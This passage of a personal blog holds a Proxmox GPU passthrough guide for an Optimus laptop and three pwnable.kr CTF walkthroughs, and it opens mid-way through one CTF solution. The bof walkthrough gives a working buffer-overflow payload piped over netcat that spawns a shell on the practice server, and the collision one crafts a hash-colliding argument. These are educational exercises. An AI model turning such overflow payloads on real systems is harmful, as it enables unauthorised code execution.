(__libc_csu_fini) ◂— push rbx RCX 0x8 RDX 0x496628 ◂— push rbp /* '<FLAG>' */ *RDI 0x6c96b0 ◂— 0x0 RSI 0x496628 ◂— push rbp /* '<FLAG>' */ R8 0x1 R9 0x3 R10 0x22 R11 0x0 R12 0x401a50 (__libc_csu_init) ◂— push r14 R13 0x0 R14 0x0 R15 0x0 RBP 0x7fffffffcad0 ◂— 0x0 RSP 0x7fffffffcac0 —▸ 0x401a50 (__libc_csu_init) ◂— push r14 *RIP 0x401195 (main+49) ◂— call 400320h ─────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────── 0x401180 <main+28> mov qword ptr [rbp - 8], rax 0x401184 <main+32> mov rdx, qword ptr [rip + 2c0ee5h] 0x40118b <main+39> mov rax, qword ptr [rbp - 8] 0x40118f <main+43> mov rsi, rdx 0x401192 <main+46> mov rdi, rax > 0x401195 <main+49> call 400320h <0x400320></code></pre> Submitting this works. You can also find the flag very easily after unpacking it by doing: strings -n40 flag</code></pre> Then the flag is the first string. I thought it was more fun to step through the program though.GPU Passthrough on Optimus Laptop in Proxmox 2024-10-27T09:41:05-05:00 Motivation</h2> The first question when beginning something is asking yourself why? In this case, the reason was more curiosity than anything specific. I run Proxmox on my old gaming laptop and only really use it for random experiments. It has quite a bit of power for that and seems to work great. Given that it is a gaming laptop, it has a dedicated graphics card inside, and I wondered if I would be able to pass it through to a VM to be able to do things like run Windows and play games or run Linux and try some machine learning with CUDA. I had never done this before, mainly because everywhere you look on the internet says it is impossible. And while I found out it is not impossible, it definitely was not easy to figure out and some of these techniques are very recent in their publication. Before you Start</h1> Things to know is that this may or may not work for you. If you have the exact same laptop as me: Dell G5 15 5587 with Nvidia GTX 1060 6GB then it probably will. Otherwise your mileage may vary but this technique seems universal from what I gathered during research. Certain Optimus laptops are either muxed or muxless. What does that mean? Basically it means that on some laptops the dedicated Nvidia GPU is wired directly to the HDMI port on the laptop whereas on others it is not. That doesn't mean all hope is lost though as there is a way to get the integrated Intel graphics working in addition as well, but it is a lot more effort that I did not end up needing to do. I will leave the resources I used at the end of the post for anyone who is curious and if enough people are interested I can also make a post on that. Getting Started</h2> Obtaining the vBIOS</h3> So the first thing you will need when starting is a copy of the vBIOS of your GPU. For me, most of the ways to do this online did not work. I would get a vague Input/Output Error</code> when trying to perform it in Linux. The way I was able to do it was weird but works flawlessly and I discovered it here on an old forum post</a> Essentially, for some reason, the Nvidia drivers place a hexdump of vBIOS of the card in a registry key in Windows. First thing you want to do is boot into Windows. Once in Windows, make sure you have the Nvidia drivers installed. With that done, next thing you want to do is try and save a specific registry file that should look like this: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0002\Session</code></pre> I had to switch out the 0002</code> to 0001</code> but whichever number has the Session</code> key should be what you want. Export that key and save it somewhere. Extracting from the Registry Key Method 1</h4> The easiest way to do this next step is to use this command that I made for macOS (but I think should work on Linux as well?): echo -e -n "\x$(iconv -f UTF-16 -t US-ASCII vbios.reg | tr -d '\n' | tr -d '\r' | awk -F: '{print $2}' | awk -F'"' '{print $1}' | tr -d ' ' | tr -d '\\' | sed 's/,/\\x/g')" > vbios.bin</code></pre> You'll know you did it right because when you run the file</code> command it should report something like: root@proxmox:/# file vbios.bin vbios.bin: BIOS (ia32) ROM Ext. IBM comp. Video "IBM VGA Compatible\001" (211*512) instruction 0xeb4b3734; at 0x170 PCI NVIDIA device=0x1c20 PRIOR, ProgIF=3, at 0x40 VPD, revision 3, code revision 0x3, last ROM, 3rd reserved 0x8000</code></pre> And the file size for me was 262144</code> bytes. Extracting from the Registry Key Method 2</h4> If for some reason that doesn't work or you want to do it on Windows, the steps are pretty much as follows: Open the .reg file in Notepad++</li> Delete these lines:</li> </ol> "vbiosSource"=hex:06 "RmRCPrevDriverVersion"=hex:33,38,38,2e,31,36,00 "RmRCPrevDriverBranch"=hex:72,33,38,38,5f,31,30,2d,35,00 "RmRCPrevDriverChangelist"=hex:7c,d8,5f,01 "RmRCPrevDriverLoadCount"=hex:01,00,00,00</code></pre> Replace all commas with spaces</li> Replace all backslashes with nothing</li> Select everything</li> Open the HxD Hex Editor</a> and create a new file</li> Paste it into the hex editor</li> Save it as vbios.bin</li> </ol> Now the same things should apply from before. I did this second method at first before creating the one liner out of curiosity and spite because I'd rather have a quick way to do things from the CLI than use a GUI. Proxmox Configuration</h2> Okay, now we have the first file we need, which is also the most important. Proxmox Host Settings</h3> First things first, we need to follow the normal Proxmox PCI-E Passthrough Guide</a>. Getting Hardware IDs</h4> So let's grab some hardware IDs. Run the lspci</code> command like so and take note of your Nvidia GPU: root@proxmox:~# lspci -nnk ... 01:00.0 VGA compatible controller [0300]: NVIDIA Corporation GP106M [GeForce GTX 1060 Mobile] [10de:1c20] (rev a1) Subsystem: Dell GP106M [GeForce GTX 1060 Mobile] [1028:0825] Kernel driver in use: vfio-pci Kernel modules: nvidiafb, nouveau 01:00.1 Audio device [0403]: NVIDIA Corporation GP106 High Definition Audio Controller [10de:10f1] (rev a1) Kernel driver in use: vfio-pci Kernel modules: snd_hda_intel ...</code></pre>Drivers</h4> Ideally you have not installed the nvidia drivers. If you have, I highly recommend uninstalling them now before going any futher: sudo apt remove 'nvidia*' bumblebee-nvidia primus-nvidia primus-vk-nvidia</code></pre> If you choose not to do this, and want to simply blacklist the drivers, just know that nvidia also has this weird systemd service called nvidia-persistenced</code> which will simply re-load the kernel module at boot so also disable that if you are leaving the original drivers installed. And reboot your host to make sure it works. Kernel Parameters</h4> The first thing you need to do is enable IOMMU, so for an Intel CPU add this to the GRUB_CMDLINE_LINUX_DEFAULT</code> line in /etc/default/grub</code> : intel_iommu=on</code></pre> And also add this line regardless of processor type in case you want better performance: iommu=pt</code></pre> Now run this to update your GRUB configuration: update-grub2</code></pre>Kernel Modules</h4> Next you need the VFIO kernel modules, so add these lines to /etc/modules</code> : vfio vfio_iommu_type1 vfio_pci vfio_virqfd #not needed if on kernel 6.2 or newer</code></pre> And then update your initramfs like so: update-initramfs -u -k all</code></pre> And now do a reboot: reboot</code></pre>Sanity Check</h4> At this point run the following command to make sure the kernel modules are loaded: lsmod | grep vfio</code></pre>Setting VFIO IDs</h3> This part may be optional, but I set it up so I'm adding it just in case you need it. Add the following line to /etc/modprobe.d/vfio.conf</code> (creating it if it doesn't exist and replacing the ids with the ids from your lspci</code> command above): options vfio-pci ids=10de:1c20,10de:10f1</code></pre> And now when you reboot, you should see that the kernel driver in use is vfio-pci when running lspci: root@proxmox:~# lspci -nnk ... 01:00.0 VGA compatible controller [0300]: NVIDIA Corporation GP106M [GeForce GTX 1060 Mobile] [10de:1c20] (rev a1) Subsystem: Dell GP106M [GeForce GTX 1060 Mobile] [1028:0825] Kernel driver in use: vfio-pci Kernel modules: nvidiafb, nouveau 01:00.1 Audio device [0403]: NVIDIA Corporation GP106 High Definition Audio Controller [10de:10f1] (rev a1) Kernel driver in use: vfio-pci Kernel modules: snd_hda_intel ...</code></pre>Copying over the vBIOS</h4> The last thing to do is to copy over the vBIOS. Put it in this directory: /usr/share/kvm/</code> and name it what you want. I named mine vbios_1060.bin</code> At this point, you should be good to go to create your VMs and get going. VM Creation and Configuration</h3> Proxmox WebUI</h4> Now in Proxmox, create your VM, but do not start it yet. Here is a picture of all the settings you need (RAM and CPU dedicated is arbitrary althought the CPU should be host): Specifically for the PCI device, you need the following after selecting your card in the dropdown (replacing vendor/device IDs and sub-vendor/device IDs with the output of lspci and the vBIOS name with whatever you named the vBIOS): Proxmox VM Manual Configuration</h4> Now for the magic bits that I pulled from this GitHub repository</a> Essentially what this is, is the NVIDIA GPU communicates with the system using a specific ACPI method defined within the Device Object. This method is called _ROM and it allows the GPU to access its vBIOS firmware via a fw_cfg object which we also create with the contents of the vBIOS. In this way, we are able to create this ACPI call functionality without requiring us to recompile OVMF or anything like that. Here is a diagram courtesy of an LLM: +-----------------+ +------------+ +---------+ | System |--------> | ACPI Table | ------> | Device | +-----------------+ +------------+ +---------+ ^ | | | _SB.PCI0.SE0.S00 | +-------------+ /|\ | \ v Device Object +-------+ +-----------------+ | | fw_cfg |--------------->| fw_cfg binary | <-| FWIO (Ports) +-------+ +-----------------+ | Field: FSEL, FDAT...</code></pre> Additionally, the ACPI table adds a battery to your VM which is required for the Windows Nvidia drivers to install properly. AML Creation</h5> Now SSH into your proxmox host, and you will need to create the following file somewhere, replacing \_SB.PCI0.SE0.S00</code> with the proper values for your card. Calculating those values can be tricky, and requires being in the VM to see where it maps the card. It doesn't matter if the card initializes correctly at this point, but you should be able to see it with lspci still. Once in a Linux VM with the card passed through, run the following lspci command: astr0n8t@pop-os:~$ lspci -tv -[0000:00]-+-00.0 Intel Corporation 82G33/G31/P35/P31 Express DRAM Controller ... +-1c.0-[01]--+-00.0 NVIDIA Corporation GP106M [GeForce GTX 1060 Mobile] | \-00.1 NVIDIA Corporation GP106 High Definition Audio Controller ...</code></pre> Now what you want is that value 1c</code> and you want to put it in a hex calculator and bitshift it by 3. So 1c << 3</code> which becomes e0</code> so SE0</code> And for the second part, I believe it is the rightmost value of 00.0</code> which is obviously just 0</code> so S00</code> A quick way to do this is with python: python -c 'print(hex(0x1c << 3))'</code></pre> Save this file with a .asl extension: DefinitionBlock ("", "SSDT", 1, "DOTLEG", "NVIDIAFU", 1) { External (\_SB.PCI0, DeviceObj) // NVIDIA GPU stuff // The device name is generated by QEMU. See hw/i386/acpi-build.c of QEMU. The number is // calculated as (slot << 3 | function), so S00 means slot 0 function 0 and S08 means slot 1 // function 0. The real one is something like \_SB.PCI0.PEG0.PEGP. Change this if you put your // GPU elsewhere in the VM. External (\_SB.PCI0.SE0.S00, DeviceObj) Scope (\_SB.PCI0.SE0.S00) { Name (FWIT, 0) // fw_cfg initialized Name (FWBI, Buffer () { 0 }) // fw_cfg binary OperationRegion (FWIO, SystemIO, 0x510, 2) // fw_cfg I/O ports Field (FWIO, WordAcc, Lock) { FSEL, 16, // Selector } Field (FWIO, ByteAcc, Lock) { Offset (1), // Offset 1 byte FDAT, 8, // Data } // Read a big-endian word Method (RWRD, 0, Serialized) { Local0 = FDAT << 8 Local0 |= FDAT Return (Local0) } // Read a big-endian dword Method (RDWD, 0, Serialized) { Local0 = RWRD () << 16 Local0 |= RWRD () Return (Local0) } // Read certain amount of data into a new buffer Method (RBUF, 1, Serialized) { Local0 = Buffer (Arg0) {} For (Local1 = 0, Local1 < Arg0, Local1++) { Local0[Local1] = FDAT } Return (Local0) } // Find a selector by name Method (FISL, 3, Serialized) { FSEL = 0x19 Local0 = RDWD () // Count For (Local1 = 0, Local1 < Local0, Local1++) { Local2 = RDWD () // Size Local3 = RWRD () // Select RWRD () // Reserved Local4 = ToString (RBUF (56)) // Name If (Arg0 == Local4) { Arg1 = Local3 Arg2 = Local2 Break } } } // Initialize ROM Method (RINT, 0, Serialized) { If (!FWIT) { FWIT = 1 // Checking for fw_cfg existence If (!CondRefOf (\_SB.PCI0.FWCF)) { Return () } FISL ("opt/com.lion328/nvidia-rom", RefOf (Local0), RefOf (Local1)) If (Local0) { FSEL = Local0 CopyObject (RBUF (Local1), FWBI) } } } Method (_ROM, 2) { RINT () Local0 = Arg1 // Limit the buffer size to 4KiB per spec If (Arg1 > 0x1000) { Local0 = 0x1000 } If (Arg0 < SizeOf (FWBI)) { Return (Mid (FWBI, Arg0, Local0)) } Return (Buffer (Local0) {}) } } // Fake battery device at LPC bridge (1f.0) External (\_SB.PCI0.SF8, DeviceObj) Scope (\_SB.PCI0.SF8) { Device (BAT0) { Name (_HID, EisaId ("PNP0C0A")) Name (_UID, 1) Method (_STA) { Return (0x0F) } } } }</code></pre> Now once that file is saved, you need to install the acpica-tools</code> package: apt install acpica-tools</code></pre> And then run iasl</code> on the .asl file: iasl /usr/share/kvm/ssdt.asl</code></pre> Which should produce /usr/share/kvm/ssdt.aml</code> which is the compiled version of the file. VM File Edit</h5> Now open up the configuration file of your VM in a text editor, it should be in /etc/pve/qemu-server/<vm-id>.conf</code> And make the following changes (replacing filenames as needed): args: -acpitable 'file=/usr/share/kvm/ssdt.aml' -fw_cfg 'name=opt/com.lion328/nvidia-rom,file=/usr/share/kvm/vbios_1060.bin' cpu: host</code></pre>Booting the VM</h2> And now you should be good to boot the VM! If using Linux, I recommend using Pop!_OS</a> initially to test things out as they pre-package the Nvidia drivers and make this simple. As you can see from this screenshot, its running in this guest with the nvidia driver loaded: If you are using Windows, then make sure to install the Nvidia drivers from their website and it should install properly and work, and you should see the device in Device Manager. Headless Mode</h3> If you want to use the HDMI port on your device, you should be able to do so now, and you can even disable the Proxmox built-in display by checking the Primary GPU</code> field in your PCI-E passthrough dialog in the WebUI. Make sure to pass through a USB keyboard and mouse if you want to do this. When you do that, you should see output on your connected display and it shouldn't seem like you're in a VM at all other than the fact that you know you are. Troubleshooting</h3> I recommend starting your VM with the CLI: qm start <vm-id></code></pre> This will print out any errors immediately to the console and allows for easier and faster debugging. Sometimes, my Proxmox host prints a weird ACPI error to the console and crashes. This usually happens when booting a new VM when the GPU has been powered down abruptly and not initialized correctly. Further Research</h2> If at this point, you can't get something to work or you want to figure out how to get your Intel integrated graphics passed through, here are all the links from my research: (if someone needs it I can create a guide for Intel passthrough as I did get it to work but I just don't use it personally and right now it involves patching and re-building OVMF which seemed like a lot for this guide) qemu(1) — Arch manual pages</a></li> [SOLVED] NVIDIA can't power off after unplugging, blocks shutdown (Page 2) / Laptop Issues / Arch Linux Forums</a></li> ubuntu change default display xrandr - Google Search</a></li> RTX 3060 laptop + Ubuntu 20.04: unable to detect internal monitor - Graphics / Linux / Linux - NVIDIA Developer Forums</a></li> Ubuntu Manpage: lshw - list hardware</a></li> Built-in laptop screen not detected when using Nvidia driver - Ask Ubuntu</a></li> PCI Utilities (lspci, setpci) for Windows</a></li> Laptop GPU passed-through, but shows as Microsoft Basic Display Adapter. NVIDIA driver will not install. : r/VFIO</a></li> [Solved] How-To replace GRUB boot loader with systemd-boot manager / Newbie Corner / Arch Linux Forums</a></li> EFISTUB - ArchWiki</a></li> GitHub - de-arl/auto-UEFI-entry: An interactive tool to auto-generate UEFI-entries</a></li> 998611 – efibootmgr creates wrong UEFI boot option on OVMF</a></li> GitHub - rhboot/efibootmgr: efibootmgr development tree</a></li> Thoughts on booting linux directly with UEFI? : r/linux</a></li> Unified kernel image - ArchWiki</a></li> EFIStub - Debian Wiki</a></li> [SOLVED]efibootmgr refuses to make new boot entry / Newbie Corner / Arch Linux Forums</a></li> proxmox gpu passthrough tell linux to use novnc display - Google Search</a></li> PCI Passthrough - Proxmox VE</a></li> Any solution to "Attempting to remove device with non-zero usage count" with nvidia-drm modeset = 1 : r/VFIO</a></li> Is everyone else getting "Invalid PCI ROM header signature: expecting 0xaa55" when trying to dump their GPU ROM? : r/VFIO</a></li> PCI passthrough via OVMF - ArchWiki</a></li> HowToIdentifyADevice/PCI - Debian Wiki</a></li> Is it possible to do a GPU passthrough with Seabios (or any other none UEFI bios) : r/VFIO</a></li> Converting Ubuntu from bios to UEFI</a></li> Move your Linux from legacy BIOS to UEFI in place with minimal downtime | Enable Sysadmin</a></li> Stop VM impossible | Proxmox Support Forum</a></li> GPU-Z Graphics Card GPU Information Utility</a></li> Mapping custom qemu config 1-1 to proxmox | Proxmox Support Forum</a></li> [TUTORIAL] - PCI/GPU Passthrough on Proxmox VE 8 : Installation and configuration | Proxmox Support Forum</a></li> (Almost) successful passthrough on muxless Dell G5 with GTX 1060 Max Q! : r/VFIO</a></li> Intel GVT-g - ArchWiki</a></li> My specs · GitHub</a></li> GitHub - marcosscriven/ovmf-with-vbios-patch: Builds a version of OVMF patched with a VBIOS rom.</a></li> How do I "git clone" a repo, including its submodules? - Stack Overflow</a></li> Combined OVMF code and vars file | Proxmox Support Forum</a></li> custom OVMF Bios | Proxmox Support Forum</a></li> 22.04.1 won't boot on Gigabyte b560m ds3h ac i5-100400 - Lubuntu Support - Lubuntu Discourse</a></li> [SOLVED] - Issues with Intel ARC A770M GPU Passthrough on NUC12SNKi72 (vfio-pci not ready after FLR or bus reset) | Proxmox Support Forum</a></li> Add support for this to be an additional OVMF instead of a permanent and global one · Issue #1 · thenickdude/pve-edk2-firmware · GitHub</a></li> Trying to enable IMMOU > No mapped devices found. | Proxmox Support Forum</a></li> Proxmox VE Administration Guide</a></li> GPU Passthrough - Error 43 | Proxmox Support Forum</a></li> Failed to copy vbios to system memory - Graphics / Linux / Linux - NVIDIA Developer Forums</a></li> Intel gvt-g not working with 6.2 | Proxmox Support Forum</a></li> IOMMU unsafe interrupts enabled, still error message | Proxmox Support Forum</a></li> Stopped start failed: QEMU exited with code 1 | Proxmox Support Forum</a></li> [SOLVED] ACPI errors and graphics card drivers issues - Linux Mint Forums</a></li> GVT-g Ubuntu 20.04. · Issue #227 · intel/gvt-linux · GitHub</a></li> Another GPU passthrough attempt on an Optimus laptop (Code 43) : r/VFIO</a></li> NVIDIA GeForce RTX 2060 Mobile success (QEMU, OVMF) : VFIO</a></li> Very hacky solution for Windows guest · Issue #2 · jscinoz/optimus-vfio-docs · GitHub</a></li> ovmf-with-vbios-patch/docker-build/files/ssdt.asl at master · ZiemlichUndead/ovmf-with-vbios-patch · GitHub</a></li> GitHub - lion328/gpu-passthrough</a></li> PCI passthrough via OVMF - ArchWiki</a></li> Failed to copy vbios to system memory - Graphics / Linux / Linux - NVIDIA Developer Forums</a></li> NVRM: Failed to copy vbios to system memory - CUDA / CUDA Setup and Installation - NVIDIA Developer Forums</a></li> Do you need or not need a vbios file? : r/VFIO</a></li> cat: rom: Input/output error · Issue #4 · awilliam/rom-parser · GitHub</a></li> Can't VFIO with a Optimus Laptop,unable to dump rom. : r/VFIO</a></li> Problem loading page</a></li> NVIDIA NVFlash 5.449 (adds support for "cheap" notebooks) | TechPowerUp Forums</a></li> How to grab a notebook's VBIOS that is not supported by NVFlash - Frequently Asked Questions - LaptopVideo2Go Forums</a></li> shell - echo bytes to a file - Unix & Linux Stack Exchange</a></li> unix - Convert file from Little-endian UTF-16 Unicode English text, with CRLF line terminators to Ascii encoding - Stack Overflow</a></li> nvidia pci passthrough failed to copy vbios to system memory - Google Search</a></li> Is vBIOS the issue in my setup? (Code 43) : r/VFIO</a></li> Short report (WIP): Got the NVIDIA GPU to passthrough on an optimus laptop : r/VFIO</a></li> [GUIDE] Optimus laptop dGPU passthrough · GitHub</a></li> You can now passthrough your dGPU as you wish with an Optimus laptop : r/VFIO</a></li> Verequies GPU Script - Pastebin.com</a></li> Clarify why Buffer is used instead of Package · Bumblebee-Project/bbswitch@ee0591b · GitHub</a></li> 156341 – Nvidia fails to power on again, resulting in AML_INFINITE_LOOP/lockups (multiple laptops affected)</a></li> GitHub - mkottman/acpi_call: A linux kernel module that enables calls to ACPI methods through /proc/acpi/call. Now with support for Integer, String and Buffer parameters.</a></li> OVMF doesn't respect -acpitable QEMU parameter · Issue #5 · tianocore/edk2 · GitHub</a></li> Load QEMU Firmware Configuration Device in virt-manager? - Server Fault</a></li> Ubuntu Manpage: iasl - ACPI Source Language compiler/decompiler</a></li> [#875] kvm: how to enable "features: hidden state=on" ? | Proxmox Support Forum</a></li> </ul> pwnable.kr walkthrough 03: bof 2024-10-23T20:30:46-05:00 bof</h1> For this challenge, we are presented with a bit different prompt than before. We now just simply get source code and a binary, as well as a netcat connection to connect to to exploit it remotely. Source Code Analysis</h2> Looking at bof.c</code> we see this: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; }</code></pre> This is a pretty classic challenge. Since the program is calling the vulnerable function gets()</code> and reading it into a 32 byte buffer, we need to provide 32 bytes to fill the buffer, and then at some offset we should be able to overwrite the key variable with the needed value of 0xcafebabe</code> Finding the Offset</h2> Using the amazing pwndbg</a> we can easily find this offset. First load the binary into pwndbg: pwndbg ./bof</code></pre> Then generate a payload with the cyclic command: pwndbg> cyclic 200 <payload></code></pre> Now disassemble the func()</code> function: pwndbg> disass func Dump of assembler code for function func: 0x5655562c <+0>: push ebp 0x5655562d <+1>: mov ebp,esp 0x5655562f <+3>: sub esp,0x48 0x56555632 <+6>: mov eax,gs:0x14 0x56555638 <+12>: mov DWORD PTR [ebp-0xc],eax 0x5655563b <+15>: xor eax,eax 0x5655563d <+17>: mov DWORD PTR [esp],0x5655578c 0x56555644 <+24>: call 0xf7e054b0 <puts> 0x56555649 <+29>: lea eax,[ebp-0x2c] 0x5655564c <+32>: mov DWORD PTR [esp],eax 0x5655564f <+35>: call 0xf7e04a00 <gets> 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe 0x5655565b <+47>: jne 0x5655566b <func+63> 0x5655565d <+49>: mov DWORD PTR [esp],0x5655579b 0x56555664 <+56>: call 0xf7dde3e0 <system> 0x56555669 <+61>: jmp 0x56555677 <func+75> 0x5655566b <+63>: mov DWORD PTR [esp],0x565557a3 0x56555672 <+70>: call 0xf7e054b0 <puts> 0x56555677 <+75>: mov eax,DWORD PTR [ebp-0xc] 0x5655567a <+78>: xor eax,DWORD PTR gs:0x14 0x56555681 <+85>: je 0x56555688 <func+92> 0x56555683 <+87>: call 0xf7ebca80 <__stack_chk_fail> 0x56555688 <+92>: leave 0x56555689 <+93>: ret End of assembler dump.</code></pre> The spot we need is the where the program compares the value to 0xcafebabe</code>: 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe</code></pre> So let's set a breakpoint there and then run the program pwndbg> b *func+40 pwndbg> r</code></pre> Then paste in the cyclic payload. Now here, we need to look at 8 bytes from the $ebp register: pwndbg> x/4x $ebp+8 0xffffbce0: 0x6161616e 0x6161616f 0x61616170 0x61616171</code></pre> And then we can calculate the offset: pwndbg> cyclic -l 0x6161616e Finding cyclic pattern of 4 bytes: b'naaa' (hex: 0x6e616161) Found at offset 52</code></pre>Writing The Exploit</h2> So we now know we need to write 52 bytes and then the required four bytes 0xcafebabe</code> A good way to do this would be (remember to reverse the endianness of the hex bytes): echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbe\xba\xfe\xca" | nc pwnable.kr 9000</code></pre> When we test this, oddly the program hangs. What is really happening is that netcat is closing the connection. A good way to resolve this is to add an extra cat command after our echo so that netcat will continue to keep the connection open and connect stdin and stdout to the netcat connection: (echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbe\xba\xfe\xca" && cat) | nc pwnable.kr 9000</code></pre> And running this we get the flag: $ (echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbe\xba\xfe\xca" && cat) | nc pwnable.kr 9000 ls bof bof.c flag log super.pl cat flag <FLAG></code></pre> pwnable.kr walkthrough 02: collision 2024-10-22T21:07:19-05:00 Collision</h1> When we login we are prsented with: col@pwnable:~$ ls -al total 36 drwxr-x--- 5 root col 4096 Oct 23 2016 . drwxr-xr-x 116 root root 4096 Oct 30 2023 .. d--------- 2 root root 4096 Jun 12 2014 .bash_history -r-sr-x--- 1 col_pwn col 7341 Jun 11 2014 col -rw-r--r-- 1 root root 555 Jun 12 2014 col.c -r--r----- 1 col_pwn col_pwn 52 Jun 11 2014 flag dr-xr-xr-x 2 root root 4096 Aug 20 2014 .irssi drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache</code></pre> This is the typical scenario where the binary is setuid to the user that owns the flag. Exploit the binary, view the flag. Taking a look at col.c we see: #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i<5; i++){ res += ip[i]; } return res; } int main(int argc, char* argv[]){ if(argc<2){ printf("usage : %s [passcode]\n", argv[0]); return 0; } if(strlen(argv[1]) != 20){ printf("passcode length should be 20 bytes\n"); return 0; } if(hashcode == check_password( argv[1] )){ system("/bin/cat flag"); return 0; } else printf("wrong passcode.\n"); return 0; }</code></pre>Looking at it in GDB</h2> Using gdb we can run through this in a more friendly environment col@pwnable:~$ gdb (gdb) source /usr/share/peda/peda.py gdb-peda$ file col gdb-peda$ r AAAAAAAAAAAAAAAAAAAA</code></pre> And right before it compares the output of the check_password function we see: 0x804855c <main+143>: mov DWORD PTR [esp],eax 0x804855f <main+146>: call 0x8048494 <check_password> 0x8048564 <main+151>: mov edx,DWORD PTR ds:0x804a020 => 0x804856a <main+157>: cmp eax,edx 0x804856c <main+159>: jne 0x8048581 <main+180> 0x804856e <main+161>: mov DWORD PTR [esp],0x80486bb 0x8048575 <main+168>: call 0x80483b0 <system@plt> 0x804857a <main+173>: mov eax,0x0 </code></pre> The values in edx and eax need to be the same: EAX: 0x46464645 EDX: 0x21dd09ec</code></pre> So it appears that maybe we could simply pass in a very similar value to the hashcode in the source code? 0x41414141 -> 0x46464645 0x42424242 -> 0x4b4b4b4a 0x???????? -> 0x21dd09ec</code></pre>Reverse Engineering the Code</h2> Looking closer at the hash function, what is actually happening is that the char pointer is being cast as an int pointer. So essentially our 20 byte string is really being interpreted as a five item integer array. AAAAAAAAAAAAAAAAAAAA -> [0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141]</code></pre> Which should explain the behavior we saw: 0x41414141+0x41414141+0x41414141+0x41414141+0x41414141=0x146464645</code></pre> And then since the computer will only look at the first four bytes it becomes 0x146464645 -> 0x46464645</code></pre>Solution?</h2> So what we need is five numbers, when added together, that will produce 0x21dd09ec</code>. A simple way to do this is subtract 0x01010101</code> four times and then take the remainder as the last bytes 0x21dd09ec - 0x01010101*4 = 0x1DD905E8</code></pre> The last trick to remember here is that x86 computers work in Little Endian format, so the bytes are going to be swapped around. Instead of putting in the string representation of 0x1DD905E8</code> we need the string representation of 0xE805D91D</code> for the computer to place it in memory in order. We can use echo to take this all in and send it to the program: echo -en '\xe8\x05\xd9\x1d\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01'</code></pre> Putting it all together gives us the flag: ./col $(echo -en '\xe8\x05\xd9\x1d\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01') <FLAG></code></pre> This challenge was a good introduction to the fact that memory can be represented many different ways. If you want to learn more about different C data types, I recommend looking at this wikipedia article</a>. pwnable.kr walkthrough 01: fd 2024-10-21T16:02:11-05:00 Welcome to the first installation in my walkthrough of the https://pwnable.kr Toddler's Bottle category of challenges. The idea is that as I start to go through all of these challenges, I'm going to make a walkthrough and post it here. Hopefully I will be able to keep this up once a week and in this way finish out this series as well as keep myself motivated to finish the first category. Let's begin. fd</h1> This challenge starts with an SSH login provided. On login we are presented with: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \| |__| || \ / || \ | | / _] | |/ ]| \ | o ) | | || _ || o || o )| | / [_ | ' / | D ) | _/| | | || | || || || |___ | _] | \ | / | | | ` ' || | || _ || O || || [_ __ | \| \ | | \ / | | || | || || || || || . || . \ |__| \_/\_/ |__|__||__|__||_____||_____||_____||__||__|\_||__|\_| - Site admin : daehee87@khu.ac.kr - irc.netgarage.org:6667 / #pwnable.kr - Simply type "irssi" command to join IRC now - files under /tmp can be erased anytime. make your directory under /tmp - to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal You have mail. Last login: Mon Oct 21 15:44:43 2024 from 84.64.199.146 fd@pwnable:~$ ls fd fd.c flag fd@pwnable:~$ ls -al total 40 drwxr-x--- 5 root fd 4096 Aug 31 16:09 . drwxr-xr-x 116 root root 4096 Oct 30 2023 .. d--------- 2 root root 4096 Jun 12 2014 .bash_history -r-sr-x--- 1 fd_pwn fd 7322 Jun 11 2014 fd -rw-r--r-- 1 root root 418 Jun 11 2014 fd.c -r--r----- 1 fd_pwn root 50 Jun 11 2014 flag -rw------- 1 root root 128 Oct 26 2016 .gdb_history dr-xr-xr-x 2 root root 4096 Dec 19 2016 .irssi drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache</code></pre> Since fd is a setuid binary owned by fd_pwn and the flag is also owned by that user, we should be able to read the flag if we can exploit that binary somehow. If we look at fd.c we get: #include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); if(!strcmp("LETMEWIN\n", buf)){ printf("good job :)\n"); system("/bin/cat flag"); exit(0); } printf("learn about Linux file IO\n"); return 0; }</code></pre> This program takes the first argument given to it, then performs the atoi()</code> function on it. Reading the linux man page on atoi()</code> man 3 atoi</code> we read: atoi, atol, atoll - convert a string to an integer</code></pre> So this expects an integer that when subtracted with 0x1234</code> will be a file descriptor. Let's try using 0x1234</code> directly or 4660</code> in decimal since that will be file descriptor 0 AKA stdin (0 is stdin, 1 is stdout, and 2 is stderr). When we use that and paste in the phrase "LETMEWIN" followed by enter we get the flag: fd@pwnable:~$ ./fd 4660 LETMEWIN good job :) <FLAG></code></pre> Quick and simple, and if you want to learn more about Linux file descriptors, here's a page from a Harvard Computer Science class going over them https://cs61.seas.harvard.edu/site/ref/file-descriptors/#gsc.tab=0 NixOS: A Flaky Experience 2024-04-20T13:57:45-05:00 I should preface this by saying that this will probably come off as a rant. Story Time</h2> So once upon a time, I decided that I wanted to convert my homelab Kubernetes cluster to using NixOS as the base operating system. The reason for this was simple: I'm already using GitOps via FluxCD for the actual configuration of the cluster, using NFS for the PVCs within the cluster, so the only thing not really documented in git was the nodes 